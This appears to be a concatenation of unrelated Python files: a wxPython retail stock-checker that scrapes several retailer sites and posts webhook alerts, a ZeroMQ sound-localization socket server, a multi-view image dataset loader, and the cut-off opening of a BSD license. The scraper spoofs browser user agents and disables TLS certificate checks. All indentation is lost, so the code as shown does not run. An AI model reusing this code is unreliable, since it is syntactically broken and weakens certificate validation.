self.list = wx.ListCtrl( self.rightPanel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_REPORT )
vbox.Add( self.list, 1, wx.ALL|wx.EXPAND, 5 )
self.log = wx.TextCtrl( self.rightPanel, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( -1,200 ), wx.TE_MULTILINE|wx.TE_READONLY )
vbox.Add( self.log, 0, wx.ALL|wx.EXPAND, 5 )
self.rightPanel.SetSizer( vbox )
self.rightPanel.Layout()
vbox.Fit( self.rightPanel )
hbox.Add( self.rightPanel, 1, wx.EXPAND, 5 )
self.SetSizer( hbox )
self.Layout()
self.statusBar = self.CreateStatusBar( 1, wx.STB_SIZEGRIP, wx.ID_ANY )
self.m_menubar1 = wx.MenuBar( 0 )
self.menuFile = wx.Menu()
self.exitItem = wx.MenuItem( self.menuFile, wx.ID_ANY, u"Exit", wx.EmptyString, wx.ITEM_NORMAL )
self.menuFile.Append( self.exitItem )
self.m_menubar1.Append( self.menuFile, u"File" )
self.menuHelp = wx.Menu()
self.m_menubar1.Append( self.menuHelp, u"Help" )
self.SetMenuBar( self.m_menubar1 )
self.Centre( wx.BOTH )
# Connect Events
self.whBtn.Bind( wx.EVT_BUTTON, self.OnManageWebhooks )
self.addBtn.Bind( wx.EVT_BUTTON, self.AddURLs )
self.editBtn.Bind( wx.EVT_BUTTON, self.OnChangeWebhook )
self.delBtn.Bind( wx.EVT_BUTTON, self.DeleteURL )
self.strtAllBtn.Bind( wx.EVT_BUTTON, self.OnRunAll )
self.app2Btn.Bind( wx.EVT_BUTTON, self.StopAll )
self.Bind( wx.EVT_MENU, self.OnClose, id = self.exitItem.GetId() )
def __del__( self ):
pass
def CheckURLs(self, event):
num = ex.list.GetItemCount()
for i in range(num):
if ex.list.IsChecked(i):
if ex.list.GetItemText(i, col=2) == "Inactive":
url = ex.list.GetItemText(i, col=0)
hook = ex.list.GetItemText(i, col=1)
RunJob(url, hook, i)
else:
if ex.list.GetItemText(i, col=2) != "Inactive":
ex.list.SetItem(i, 2, "Stopping")
colour = wx.Colour(255, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
def RunAll(self, event):
num = ex.list.GetItemCount()
for i in range(num):
if ex.list.GetItemText(i, col=2) == "Inactive":
url = ex.list.GetItemText(i, col=0)
hook = ex.list.GetItemText(i, col=1)
RunJob(url, hook, i)
def StopAll(self, event):
num = ex.list.GetItemCount()
for i in range(num):
if ex.list.GetItemText(i, col=2) != "Inactive":
ex.list.SetItem(i, 2, "Stopping")
colour = wx.Colour(255, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
def AddURLs(self, event):
urldict = return_data("./data/products.json")
product_url = wx.GetTextFromUser('Enter a Product URL', 'Insert dialog')
product_webhook = "None"
num = ex.list.GetItemCount()
idx = (num + 1)
if product_url != '':
index = ex.list.InsertItem(idx, product_url)
ex.list.SetItem(index, 1, "None")
ex.list.SetItem(index, 2, "Inactive")
idx += 1
set_data("./data/products.json", product_url, product_webhook)
urldict = return_data("./data/products.json")
def DeleteURL(self, event):
urldict = return_data("./data/products.json")
selected = ex.list.GetFocusedItem()
text = ex.list.GetItemText(selected, col=0)
if selected != -1:
ex.list.DeleteItem(selected)
del urldict[text]
with open("./data/products.json", "w") as file:
json.dump(urldict, file)
file.close()
urldict = return_data("./data/products.json")
def OnChangeWebhook(self, e):
webhook_dict = return_data("./data/webhooks.json")
selected = ex.list.GetFocusedItem()
if selected != -1:
whDialog = WebhookDialog(None)
whDialog.ShowModal()
whDialog.Destroy()
def OnManageWebhooks(self, e):
webhook_dict = return_data("./data/webhooks.json")
global webhookListChoices
webhookListChoices = []
for k in webhook_dict:
webhookListChoices.append(k)
whManager = WebhookManager(None)
whManager.Show()
def OnClose(self, e):
self.Destroy()
def OnSelectAll(self, event):
num = self.list.GetItemCount()
for i in range(num):
self.list.CheckItem(i)
def OnDeselectAll(self, event):
num = self.list.GetItemCount()
for i in range(num):
self.list.CheckItem(i, False)
def OnApply(self, event):
ex.log.AppendText("Processing Selections..." + '\n')
t = Thread(target=self.CheckURLs, args=(self,))
t.start()
def OnRunAll(self, event):
for url in urldict:
stockdict.update({url: 'False'})
ex.log.AppendText("Processing Selections..." + '\n')
t = Thread(target=self.RunAll, args=(self,))
t.start()
###########################################################################
## Custom init
###########################################################################
def return_data(path):
with open(path,"r") as file:
data = json.load(file)
file.close()
return data
def write_data(path,data):
with open(path, "w") as file:
json.dump(data, file)
file.close()
def set_data(path, val1, val2):
data = return_data(path)
data.update({val1: val2})
write_data(path, data)
class Amazon:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('log-level=3')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36"')
options.add_argument("headless")
driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)
driver.get(url)
html = driver.page_source
if "To discuss automated access to Amazon data please contact api-services-support@amazon.com." in html:
print("Amazon's Bot Protection is preventing this call.")
ex.log.AppendText("Amazon's Bot Protection prevented a refresh." + '\n')
else:
status_raw = driver.find_element_by_xpath("//div[@id='olpOfferList']")
status_text = status_raw.text
title_raw = driver.find_element_by_xpath("//h1[@class='a-size-large a-spacing-none']")
title_text = title_raw.text
title = title_text
img_raw = driver.find_element_by_xpath("//div[@id='olpProductImage']//img")
img = img_raw.get_attribute('src')
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if "Currently, there are no sellers that can deliver this item to your location." not in status_text:
print("[" + current_time + "] " + "In Stock: (Amazon.com) " + title + " - " + url)
slack_data = {
'username': "Amazon Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/amazon.png",
'content': "Amazon Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock on Amazon",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
ex.log.AppendText("[" + current_time + "] " + title + " in stock at Amazon - " + url + '\n')
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Amazon.com) " + title + '\n')
stockdict.update({url: 'False'})
driver.quit()
class BH:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
#tree = html.fromstring(page.content)
#imgs = tree.xpath("//a[contains(@class,'wrapper')]")
#img_raw = {imgs[0].attrib}
#img = img_raw.__getattribute__(href)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if page.status_code == 200:
if "Add to Cart" in page.text:
print("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url)
slack_data = {
'username': "BH Photo Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bhphoto.png",
'content': "BH Photo Stock Alert: " + url,
'embeds': [{
'title': url,
'description': url + " in stock at BH Photo",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': "https://wiki.tripwireinteractive.com/images/4/47/Placeholder.png"
}
}]
}
ex.log.AppendText("[" + current_time + "] " + "In Stock: (bhphotovideo.com) " + url + '\n')
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (bhphotovideo.com) " + url + '\n')
stockdict.update({url: 'False'})
class BestBuy:
def __init__(self, sku, orig_url, hook):
self.sku = sku
self.hook = hook
webhook_url = webhook_dict[hook]
url = "https://www.bestbuy.com/api/tcfb/model.json?paths=%5B%5B%22shop%22%2C%22scds%22%2C%22v2%22%2C%22page%22%2C%22tenants%22%2C%22bbypres%22%2C%22pages%22%2C%22globalnavigationv5sv%22%2C%22header%22%5D%2C%5B%22shop%22%2C%22buttonstate%22%2C%22v5%22%2C%22item%22%2C%22skus%22%2C" + sku + "%2C%22conditions%22%2C%22NONE%22%2C%22destinationZipCode%22%2C%22%2520%22%2C%22storeId%22%2C%22%2520%22%2C%22context%22%2C%22cyp%22%2C%22addAll%22%2C%22false%22%5D%5D&method=get"
headers2 = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36"
}
page = requests.get(url, headers=headers2)
link = "https://www.bestbuy.com/site/" + sku + ".p?skuId=" + sku
al = page.text
search_string = '"skuId":"' + sku + '","buttonState":"'
stock_status = al[al.find(search_string) + 33 : al.find('","displayText"')]
product_name = sku_dict.get(sku)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if stock_status == "SOLD_OUT":
print("[" + current_time + "] " + "Sold Out: (BestBuy.com) " + product_name)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (BestBuy.com) " + product_name + '\n')
stockdict.update({sku: 'False'})
elif stock_status == "CHECK_STORES":
print(product_name + " sold out @ BestBuy (check stores status)")
stockdict.update({sku: 'False'})
else:
if stock_status == "ADD_TO_CART":
print("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (BestBuy.com) " + product_name + " - " + link + '\n')
#slack_data = {'content': "[" + current_time + "] " + product_name + " In Stock @ BestBuy " + link}
slack_data = {
'username': "BestBuy Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/bestbuy.png",
'content': "BestBuy Stock Alert:",
'embeds': [{
'title': product_name,
'description': product_name + " in stock at BestBuy",
'url': link,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': bbimgdict.get(sku)
}
}]
}
if stockdict.get(orig_url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({orig_url: 'True'})
#print(stockdict)
class Gamestop:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('log-level=3')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36"')
options.add_argument("headless")
driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)
driver.get(url)
html = driver.page_source
status_raw = driver.find_element_by_xpath("//div[@class='add-to-cart-buttons']")
status_text = status_raw.text
title_raw = driver.find_element_by_xpath("//h1[@class='product-name h2']")
title_text = title_raw.text
title = title_text
image_raw = driver.find_element_by_xpath("//img[@class='mainImg ae-img']")
img = image_raw.get_attribute('src')
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if "ADD TO CART" in status_text:
print("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (Gamestop.com) " + title + " - " + url + '\n')
slack_data = {
'username': "GameStop Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/gamestop.png",
'content': "GameStop Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at GameStop",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Gamestop.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Gamestop.com) " + title + '\n')
stockdict.update({url: 'False'})
driver.quit()
class Target:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
al = page.text
tree = html.fromstring(page.content)
imgs = tree.xpath("//img[1]")
img_raw = str(imgs[0].attrib)
img = img_raw[20:-2]
title = al[al.find('"twitter":{"title":') + 20 : al.find('","card')]
#print(title)
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
status = al[al.find('"availability_status":"') + 23 : al.find('","multichannel_options"')]
if status == "OUT_OF_STOCK":
print("[" + current_time + "] " + "Sold Out: (Target.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Target.com) " + title + '\n')
stockdict.update({url: 'False'})
elif status == "IN_STOCK":
print("[" + current_time + "] " + "In Stock: (Target.com) " + title + " - " + url)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (Target.com) " + title + " - " + url + '\n')
slack_data = {
'username': "Target Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/target.png",
'content': "Target Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at Target",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
stockdict.update({url: 'True'})
#print(stockdict)
else:
print("[" + current_time + "] " + "UNKNOWN STATUS: (Target.com) " + title + " for status of: " + status)
class Walmart:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
page = requests.get(url)
tree = html.fromstring(page.content)
title_raw = tree.xpath("//h1[@class='prod-ProductTitle font-normal']")
title = title_raw[0].text
price_raw = tree.xpath("//span[@class='price display-inline-block arrange-fit price price--stylized']//span[@class='price-characteristic']")
price = price_raw[0].text
img_raw = tree.xpath("//meta[@property='og:image']/@content")
img = img_raw[0]
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if page.status_code == 200:
if "Add to cart" in page.text:
print("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url)
ex.log.AppendText("[" + current_time + "] " + "In Stock: (Walmart.com) " + title + " for $" + price + " - " + url + '\n')
slack_data = {
'username': "Walmart Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/walmart.png",
'content': "Walmart Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock at Walmart for $" + price,
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Price:",
"value": "$" + price
}
],
'thumbnail': {
'url': img
}
}]
}
if stockdict.get(url) == 'False':
if maxprice != 0:
if int(price) > maxprice:
print("in stock but not MSRP")
else:
try:
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
except:
print("Webhook sending failed. Invalid URL configured.")
else:
try:
response = requests.post(
webhook_url, data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'})
except:
print("Webhook sending failed. Invalid URL configured.")
stockdict.update({url: 'True'})
else:
print("[" + current_time + "] " + "Sold Out: (Walmart.com) " + title)
#ex.log.AppendText("[" + current_time + "] " + "Sold Out: (Walmart.com) " + title + '\n')
stockdict.update({url: 'False'})
def write_log(string):
try:
ex.log.AppendText((string + '\n'))
except:
print("Failed to output to log - Message: \n " + string)
def amzfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
Amazon(url, hook)
except:
print("Some error ocurred parsing Amazon")
write_log("An error ocurred parsing Amazon")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def bestbuyfunc(sku, orig_url, hook, i):
print("Thread started -> " + sku)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
BestBuy(sku, orig_url, hook)
except:
print("Some error ocurred parsing BestBuy")
write_log("An error ocurred parsing BestBuy")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def gamestopfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
Gamestop(url, hook)
except:
print("Some error ocurred parsing Gamestop")
write_log("An error ocurred parsing Gamestop")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def targetfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
Target(url, hook)
except:
print("Some error ocurred parsing Target")
write_log("An error ocurred parsing Target")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def walmartfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
hook = ex.list.GetItemText(i, col=1)
Walmart(url, hook)
except:
print("Some error ocurred parsing WalMart")
write_log("An error ocurred parsing Walmart")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def bhfunc(url, hook, i):
print("Thread started -> " + url)
while True:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status == "Active":
try:
hook = ex.list.GetItemText(i, col=1)
BH(url, hook)
except:
print("Some error ocurred parsing BH Photo")
write_log("An error ocurred parsing BH Photo")
time.sleep(10)
else:
print("Aborted Thread")
colour = wx.Colour(0, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Inactive")
break
except:
break
def RunJob(url, hook, i):
#Amazon URL Detection
if "amazon.com" in url:
try:
active_status = ex.list.GetItemText(i, col=2)
if "offer-listing" in url:
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Amazon URL detected using Webhook destination " + hook)
write_log(("Amazon URL detected -> " + hook))
t = Thread(target=amzfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
else:
print("Invalid Amazon link detected. Please use the Offer Listing page.")
except:
print("Error processing URL: " + url)
#Target URL Detection
elif "gamestop.com" in url:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Gamestop URL detected using Webhook destination " + hook)
write_log(("GameStop URL detected -> " + hook))
t = Thread(target=gamestopfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#BestBuy URL Detection
elif "bestbuy.com" in url:
try:
print("BestBuy URL detected using Webhook destination " + hook)
#ex.log.AppendText("BestBuy URL detected using Webhook destination " + hook + '\n')
parsed = urlparse.urlparse(url)
sku = parse_qs(parsed.query)['skuId']
sku = sku[0]
bestbuylist.append(sku)
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"cache-control": "max-age=0",
"upgrade-insecure-requests": "1",
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69 Safari/537.36"
}
page = requests.get(url, headers=headers)
al = page.text
tree = html.fromstring(page.content)
img = tree.xpath('//img[@class="primary-image"]/@src')[0]
title = al[al.find('<title >') + 8 : al.find(' - Best Buy</title>')]
sku_dict.update({sku: title})
bbdict.update({sku: hook})
bbimgdict.update({sku: img})
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("BestBuy URL detected using Webhook destination " + hook)
write_log(("BestBuy URL detected -> " + hook))
orig_url = url
t = Thread(target=bestbuyfunc, args=(sku, orig_url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#Target URL Detection
elif "target.com" in url:
try:
#targetlist.append(url)
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Target URL detected using Webhook destination " + hook)
write_log(("Target URL detected -> " + hook))
t = Thread(target=targetfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#Walmart URL Detection
elif "walmart.com" in url:
try:
#walmartlist.append(url)
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("Walmart URL detected using Webhook destination " + hook)
write_log(("Walmart URL detected -> " + hook))
t = Thread(target=walmartfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
#B&H Photo URL Detection
elif "bhphotovideo.com" in url:
try:
active_status = ex.list.GetItemText(i, col=2)
if active_status != "Active":
colour = wx.Colour(0, 255, 0, 255)
ex.list.SetItemTextColour(i, colour)
ex.list.SetItem(i, 2, "Active")
print("BH Photo URL detected using Webhook destination " + hook)
write_log(("BH Photo URL detected -> " + hook))
t = Thread(target=bhfunc, args=(url, hook, i))
t.start()
time.sleep(0.5)
except:
print("Error processing URL: " + url)
def main():
app = wx.App()
global ex
ex = GUI(None)
global stockdict
stockdict = {}
products = []
global bestbuylist
bestbuylist = []
global bbdict
bbdict = {}
global bbimgdict
bbimgdict = {}
global sku_dict
sku_dict = {}
global webhook_dict
webhook_dict = return_data("./data/webhooks.json")
global urldict
urldict = return_data("./data/products.json")
#set all URLs to be "out of stock" to begin
for url in urldict:
stockdict.update({url: 'False'})
for prod in urldict:
products.append((prod, urldict[prod], "Inactive"))
ex.list.InsertColumn(0, 'URL', width=540)
ex.list.InsertColumn(1, 'Webhook')
ex.list.SetColumnWidth(col=1, width=100)
ex.list.InsertColumn(2, 'Status')
idx = 0
for i in products:
index = ex.list.InsertItem(idx, i[0])
ex.list.SetItem(index, 1, i[1])
ex.list.SetItem(index, 2, i[2])
idx += 1
ex.Show()
app.MainLoop()
if __name__ == '__main__':
main()
|
Soundlocalization_socket_local.py
|
#
# Created on Sat Oct 09 2021
# Author: Owen Yip
# Mail: me@owenyip.com
#
import os, sys
import threading
import numpy as np
import time
import zmq
import json
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
class SERVER:
def __init__(self):
context = zmq.Context()
sl_port = "5454"
self.transmit_topic = "NAV_WALKER_POSE"
self.receive_topic = "NAV_SL_LOCATION"
self.transmit_socket = context.socket(zmq.PUB)
self.transmit_socket.bind("tcp://*:5455")
self.receive_socket = context.socket(zmq.SUB)
self.receive_socket.connect("tcp://127.0.0.1:%s" % sl_port)
self.receive_socket.setsockopt_string(zmq.SUBSCRIBE, self.receive_topic)
def transmit(self, message):
msg = "%s%s" % (self.transmit_topic, message)
self.transmit_socket.send_string(msg)
print("Sending data: %s" % msg)
def transmit_forever(self, message):
while True:
self.transmit(message)
time.sleep(1)
def receive(self):
message = self.receive_socket.recv_string()
return message.replace(self.receive_topic, "")
def receive_forever(self):
while True:
message = self.receive()
control = json.loads(message)
print("Received request: %s" % control)
if __name__ == "__main__":
msg = 'server to client'
server = SERVER()
p2 = threading.Thread(target=server.transmit_forever, args=((msg,)))
p1 = threading.Thread(target=server.receive_forever, args=())
p2.start()
p1.start()
|
input.py
|
import cv2
import random
import numpy as np
import time
import queue
import threading
import globals as g_
from concurrent.futures import ThreadPoolExecutor
from functools import partialmethod
W = H = 256
class Shape:
def __init__(self, list_file):
with open(list_file) as f:
self.label = int(f.readline())
self.V = int(f.readline())
view_files = [l.strip() for l in f.readlines()]
self.views = self._load_views(view_files, self.V)
self.done_mean = False
def _load_views(self, view_files, V):
views = []
selection = np.random.random_sample(V) > g_.RANDOM_DROP
for ind, f in enumerate(view_files):
try:
if g_.RANDOM_DROP == 0 or selection[ind] == True:
im = cv2.imread(f)
im = cv2.resize(im, (W, H))
else:
im = np.random.random_sample(W*H*3).reshape((W, H, 3)) * 256
im = im.astype(np.int8)
except cv2.error:
print('im error: %s', f)
raise
# im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR) #BGR!!
assert im.shape == (W,H,3), 'BGR!'
im = im.astype('float32')
views.append(im)
views = np.asarray(views)
return views
def subtract_mean(self):
if not self.done_mean:
mean_bgr = (104., 116., 122.)
for i in range(3):
self.views[:,:,:,i] -= mean_bgr[i]
self.done_mean = True
def crop_center(self, size=(227,227)):
w, h = self.views.shape[1], self.views.shape[2]
wn, hn = size
left = int(w / 2 - wn / 2)
top = int(h / 2 - hn / 2)
right = left + wn
bottom = top + hn
self.views = self.views[:, left:right, top:bottom, :]
def crop_random(self, size=(227,227)):
w, h = self.views.shape[1], self.views.shape[2]
wn, hn = size
views = np.zeros((self.V, wn, hn, 3))
for i in range(self.V):
left = random.randrange(0, w - wn)
top = random.randrange(0, h - hn)
right = left + wn
bottom = top + hn
views[i, ...] = self.views[i, left:right, top:bottom, :]
self.views = views
class Dataset:
def __init__(self, listfiles, labels, subtract_mean, V):
self.listfiles = listfiles
self.labels = labels
self.shuffled = False
self.subtract_mean = subtract_mean
self.V = V
print('dataset inited')
print(' total size: %d' % len(listfiles))
def shuffle(self):
z = list(zip(self.listfiles, self.labels))
random.shuffle(z)
self.listfiles, self.labels = [list(l) for l in list(zip(*z))]
self.shuffled = True
def batches(self, batch_size, center_crop=True):
for x,y in self._batches_fast(self.listfiles, batch_size, center_crop):
yield x,y
def sample_batches(self, batch_size, n):
listfiles = random.sample(self.listfiles, n)
for x,y in self._batches_fast(listfiles, batch_size):
yield x,y
def _batches(self, listfiles, batch_size):
n = len(listfiles)
for i in range(0, n, batch_size):
starttime = time.time()
lists = listfiles[i : i+batch_size]
x = np.zeros((batch_size, self.V, g_.IMG_W, g_.IMG_H, 3))
y = np.zeros(batch_size)
for j,l in enumerate(lists):
s = Shape(l)
s.crop_center(size=(g_.IMG_W, g_.IMG_H))
if self.subtract_mean:
s.subtract_mean()
x[j, ...] = s.views
y[j] = s.label
print('load batch time:', time.time()-starttime, 'sec')
yield x, y
def _load_shape(self, listfile, center_crop=True):
s = Shape(listfile)
if center_crop == True:
s.crop_center(size=(g_.IMG_W, g_.IMG_H))
else:
s.crop_random(size=(g_.IMG_W, g_.IMG_H))
if self.subtract_mean:
s.subtract_mean()
return s
_random_load_shape = partialmethod(_load_shape, center_crop=False)
def _batches_fast(self, listfiles, batch_size, center_crop=True):
subtract_mean = self.subtract_mean
n = len(listfiles)
def load(listfiles, q, batch_size, center_crop):
n = len(listfiles)
with ThreadPoolExecutor(max_workers=16) as pool:
for i in range(0, n, batch_size):
sub = listfiles[i: i + batch_size] if i < n-1 else [listfiles[-1]]
if center_crop == True:
shapes = list(pool.map(self._load_shape, sub))
else:
shapes = list(pool.map(self._random_load_shape, sub))
views = np.array([s.views for s in shapes])
labels = np.array([s.label for s in shapes])
q.put((views, labels))
# indicate that I'm done
q.put(None)
# This must be larger than twice the batch_size
q = queue.Queue(maxsize=g_.INPUT_QUEUE_SIZE)
# background loading Shapes process
p = threading.Thread(target=load, args=(listfiles, q, batch_size, center_crop))
# daemon child is killed when parent exits
p.daemon = True
p.start()
x = np.zeros((batch_size, self.V, g_.IMG_W, g_.IMG_H, 3))
y = np.zeros(batch_size)
for i in range(0, n, batch_size):
starttime = time.time()
item = q.get()
if item is None:
break
x, y = item
# print 'load batch time:', time.time()-starttime, 'sec'
yield x, y
def size(self):
""" size of listfiles (if splitted, only count 'train', not 'val')"""
return len(self.listfiles)
|
manager.py
|
"""
Copyright (c) 2010-2012, Contrail consortium.
All rights reserved.
Redistribution and use in source and binary forms,
with or without modification, are permitted provided
that the following conditions are met:
1. Redistributions of source code must retain the
above copyright notice, this list of conditions
and the following disclaimer.
2. Redistributions in binary form must reproduce
the above copyright notice, this list of
conditions and the following disclaimer in the
documentation and/or other materials provided
with the distribution.
3. Neither the name of the Contrail consortium nor the
names of its contributors may be used to endorse
or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
